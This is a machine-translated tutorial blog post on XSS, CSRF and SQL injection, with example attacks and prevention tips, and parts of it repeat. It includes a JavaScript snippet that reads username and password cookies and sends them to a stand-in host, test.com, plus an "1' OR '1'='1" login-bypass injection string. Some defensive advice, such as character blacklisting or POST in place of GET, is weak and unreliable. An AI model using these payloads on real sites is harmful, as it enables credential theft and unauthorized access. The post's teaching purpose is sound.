Web security and protection (XSS, CSRF, sql injection)

Others 2020-10-28 13:07:19 views: null

XSS attack principle

Xss (cross-site scripting) attack refers to the attacker inserting malicious html tags or javascript code into web pages.

For example:
①The attacker puts a seemingly safe link in the forum to cheat the user to click and steals the user’s private information in the cookie;
②Or the attacker adds a malicious form to the forum, but when the user submits the form, The information is sent to the attacker’s server instead of the trusted site the user originally thought.
The following allows users to post messages
Insert picture description here
because we fully trust user input, but some users with ulterior motives will input like this
Insert picture description here

In this way, no matter who visits this page, the console will output "Hey you are a fool fish!". If this is just a malicious joke, some people do things that are not cute, and some users will use this vulnerability to steal users Information, tricking people to open malicious websites or download malicious programs, etc., look at the simplest example of
using xss to steal usernames and passwords.
Of course, this example is very simple, almost no website can be attacked, just look at the principle. We know that many login interfaces have the function of remembering the user name and password to facilitate the user to log in next time. Some websites directly record the user name and password in plain text. After malicious users log in to the account, use a simple tool to view the cookie structure name, if the website If there is an xss vulnerability, you can simply use jsonp to obtain the username and password of other users.

A malicious user would type

Insert picture description here

Let's see what is hidden in http://test.com/hack.js

<pre style="margin: 0px; white-space: pre-wrap; overflow-wrap: break-word; padding: 0px; list-style-type: none; list-style-image: none; font-family: &quot;Courier New&quot; !important; font-size: 12px !important;">
var username=CookieHelper.getCookie('username').value; 
var password=CookieHelper.getCookie('password').value; 
var script =document.createElement('script');
script.src='http://test.com/index.php?username='+username+'&password='+password;
document.body.appendChild(script);
</pre>

A few simple javascript, get the username and password in the cookie, use jsonp to directhttp://test.com/index.php

harm:

1. Steal user information, such as machine login accounts, user online banking accounts, and various administrator accounts

2. Control corporate data, including the ability to read, tamper, add, and delete sensitive corporate data

3. Theft of important data of commercial value from the company

4. Illegal transfer

5. Force email

7. Control the victim's machine to launch attacks on other websites

XSS attack prevention method

Firstly, the user input places and variables in the code need to be carefully checked for length and "<", ">", ";", "'" and other characters are filtered;
secondly, any content must be encoded before being written to the page to avoid The html tag was accidentally made. If this level is done well, at least more than half of XSS attacks can be blocked.

First, avoid leaking user privacy directly in cookies, such as email, password, etc.

Secondly, by binding the cookie to the system ip to reduce the risk of cookie leakage. In this way, the cookie obtained by the attacker has no actual value and cannot be replayed.

Try to use POST instead of GET to submit the form

XSS attack and CSRF attack (cross-site request forgery) difference

XSS is to obtain information without knowing the code and data package of other user pages in advance. CSRF is to complete the specified action on behalf of the user, and needs to know the codes and data packets of other user pages.

To complete a CSRF attack, the victim must complete two steps in sequence:

Log in to trusted website A and generate a cookie locally.

Visit the dangerous website B without logging out of A.

CSRF attack

Principle:
CSRF (Cross Site Request Forgery), namely cross-site request forgery, is a common Web attack. The victim user of the CSRF attack logs on to website A, enters personal information, and saves the cookie generated by the server locally. Then click on the A website and the attacker constructs a malicious link to jump to the B website, and then the user cookie information carried by the B website to visit the B website. Let A website create a false impression that the user visits by himself, so as to perform a series of operations, the most common is transfer.

Examples:
1. A website user Bob may be browsing a chat forum while another user Alice is also in this forum, and the latter has just posted a picture message with a link to Bob's bank. Imagine that Alice writes a link to submit a form for withdrawal on Bob's bank site and uses this link as the image src. If Bob’s bank saves his authorization information in a cookie, and the cookie has not expired, then when Bob’s browser tries to load the picture, it will submit the withdrawal form and his cookie, so that authorization can be made without Bob’s consent This transaction.

Harm:
A web application that performs certain actions based on trusted input forms and authenticated users who do not need to be authorized for certain actions. The user who has been authenticated by the cookie stored in the user's browser will send an HTTP request to the site that trusts him without knowing it, and then perform actions that the user does not want to do.

Prevention:

1. Verification code.
In the process of interaction between the application and the user, especially the core step of account transaction, the user is forced to enter a verification code to complete the final request. Under normal circumstances, the verification code is good enough to deter
CSRF attacks. But adding a verification code reduces the user experience, and the website cannot add verification codes to all operations. Therefore, the verification code can only be used as an auxiliary means to set verification codes at key business points.

2. Anti CSRF Token.
The current more complete solution is to add Anti-CSRF-Token, that is,
add a randomly generated token as a parameter in the HTTP request when sending the request , and establish an interceptor on the server to verify the token. The server reads the token value in the cookie of the browser's current domain, and checks
whether the token in the request and the token value in the cookie are both existent and equal, before it considers this to be a legitimate request.

CSRF defense

There are many ways and methods of CSRF on the server, but the general idea is the same, which is to add pseudo-random numbers on the client page.

How to pass the verification code

SQL injection attack

Principle:
SQL injection (SQL Injection), when the application transmits the SQL(Structured Query Languagestructured query language to the backend database , the attacker inserts the SQL command into the web form submission or enters the query string of the domain name or page request, and finally deceives the server to execute malicious SQL commands .

Example:
The SQL query code for login verification of a certain website is:

strSQL = "SELECT * FROM users WHERE (name = '" + userName +"') and (pw = '"+ passWord +"');"
When maliciously filled in
userName = "1' OR '1'='1";
and
passWord = "1' OR '1'='1";,
it will cause the original SQL string to be filled in,
strSQL = "SELECT * FROM users WHERE (name = '1' OR '1'='1') and (pw = '1' OR '1'='1');"
that is, the SQL command actually executed will become the following
strSQL = ``"SELECT * FROM users;"

Therefore, you can log in to the website without account password. Therefore, SQL injection attacks are commonly known as hackers' fill-in-the-blank games.

Harm:
get administrator rights

Prevention:

1. Add blacklist or whitelist verification
Whitelist verification generally refers to checking whether the user input meets the expected type, length, value range or other format standards. Blacklist verification refers to rejecting the user request if the user input contains obvious malicious content. When using whitelist verification, it usually cooperates with blacklist verification.

2. Safety inspection
When the project is completed, always insist on safety inspection.

3. Prevent the leakage
of sensitive system information . Strictly control the access rights of data tables, and try to limit unnecessary access rights of users

to sum up:

The principle of sql injection
is to insert the SQL command into the Web form to submit or enter the query string of the domain name or page request to finally deceive the server to execute malicious SQL commands.

SQL injection prevention

1. Never trust the user's input. To verify the user's input, you can use regular expressions, or limit the length, convert single quotes and double "-", etc.

2. Never use dynamic assembly SQL, you can use parameterized SQL or directly use stored procedures for data query access.

3. Never use an administrator's database connection, and use a separate database connection with limited authority for each application.

4. Do not store confidential information in plaintext, please encrypt or hash out passwords and sensitive information.

XSS
Xss (cross-site scripting) attack refers to the attacker inserting malicious html tags or javascript code into a Web page.
xss prevention

Firstly, the user input places and variables in the code need to be carefully checked for length and "<", ">", ";", "'" and other characters are filtered;
secondly, any content must be encoded before being written to the page to avoid The html tag was accidentally made. If this level is done well, at least more than half of XSS attacks can be blocked.

First, avoid leaking user privacy directly in cookies, such as email, password, etc.

Secondly, by binding the cookie to the system ip to reduce the risk of cookie leakage. In this way, the cookie obtained by the attacker has no actual value and cannot be replayed.

Try to use POST instead of GET to submit the form

CSRF

CSRF (Cross Site Request
Forgery), or cross-site request forgery, is a common Web attack. The victim user of the CSRF attack logs on to website A, enters personal information, and saves the cookie generated by the server locally. Then click on a malicious link constructed by the attacker on the A website to jump to the B website, and then the user cookie information carried by the B website to visit the B website.

CSRF defense

There are many ways and methods of CSRF on the server, but the general idea is the same, which is to add pseudo-random numbers on the client page.

How to pass the verification code

Guess you like

Origin blog.csdn.net/weixin_43638968/article/details/109292659
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com